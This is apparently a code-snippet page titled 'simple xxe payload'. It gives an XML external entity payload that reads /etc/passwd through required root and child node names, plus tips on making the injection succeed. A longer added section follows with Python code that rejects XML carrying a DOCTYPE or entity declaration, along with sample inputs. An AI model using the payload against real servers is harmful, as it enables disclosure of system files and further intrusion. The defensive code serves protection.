Created
October 24, 2018 01:56
simple xxe payload
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (x)>
<!ENTITY file SYSTEM "/etc/passwd">
]>
<RequiredRootXMLNode>
<RequiredChildXMLNode>&file;</RequiredChildXMLNode>
</RequiredRootXMLNode>
x = whatever value
root node = first node in XML
child node = node inside of the "first node"
If you use XXE injection, you need to know that some webservers require a specific XML node name, or the injection will fail.
The webserver might return "Internal server error", for instance.
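
From the defending side, a payload like the one above depends on the server's parser accepting a DOCTYPE and resolving the external entity. The following is an added example, not part of the gist: a gate that rejects any document carrying a DOCTYPE or entity declaration before it reaches the application parser. The names `parse_untrusted` and `DTDForbidden` and both sample documents are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


def parse_untrusted(data: bytes) -> ET.Element:
    """Return the root element only if the document declares no DTD."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        raise DTDForbidden(f"entity {name!r} (SYSTEM {system_id!r}) is not allowed")

    # First pass: expat with handlers that abort on any DTD construct.
    gate = expat.ParserCreate()
    gate.StartDoctypeDeclHandler = on_doctype
    gate.EntityDeclHandler = on_entity
    gate.Parse(data, True)  # raises DTDForbidden or expat.ExpatError

    # Second pass: the document is DTD-free, so build the tree normally.
    return ET.fromstring(data)


# Constructed sample: a plain request body with the expected node names.
BENIGN = (
    b'<?xml version="1.0"?>'
    b"<RequiredRootXMLNode>"
    b"<RequiredChildXMLNode>hello</RequiredChildXMLNode>"
    b"</RequiredRootXMLNode>"
)

# Constructed sample: same shape as the gist, with a placeholder SYSTEM id.
WITH_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE data [<!ENTITY file SYSTEM "file:///constructed/placeholder">]>'
    b"<RequiredRootXMLNode>"
    b"<RequiredChildXMLNode>&file;</RequiredChildXMLNode>"
    b"</RequiredRootXMLNode>"
)

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).find("RequiredChildXMLNode").text)
    try:
        parse_untrusted(WITH_DTD)
    except DTDForbidden as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright also means the server can return a clear validation error instead of the "Internal server error" mentioned above.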